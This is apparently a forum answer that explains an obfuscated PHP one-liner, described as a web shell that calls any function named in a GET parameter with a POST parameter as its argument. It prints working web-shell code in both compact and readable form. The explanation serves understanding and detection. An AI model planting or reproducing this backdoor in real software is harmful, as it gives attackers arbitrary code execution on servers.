As Reeno already said in a comment, it's like a PHP shell.
Explanation
Store the GET variable with the key '2' in a variable called
$_
. Due to PHP's nature of weak typing, we do not need quotes around the number.$_=@$_GET[2]
Treat
$_
as a callable function name and execute it with$_POST[1]
as the first argument.@$_($_POST[1])
The @
operators should suppress error logging, see PHP.net: Error Control Operators.
The concatenation operator between the two statements does actually nothing important. It could be rewritten like this:
$_=@$_GET[2];
@$_($_POST[1]);
Use case
Calling arbitrary functions. I won't mention the specific HTTP headers for a successful attack, but this should be fairly easy for every (web) programmer.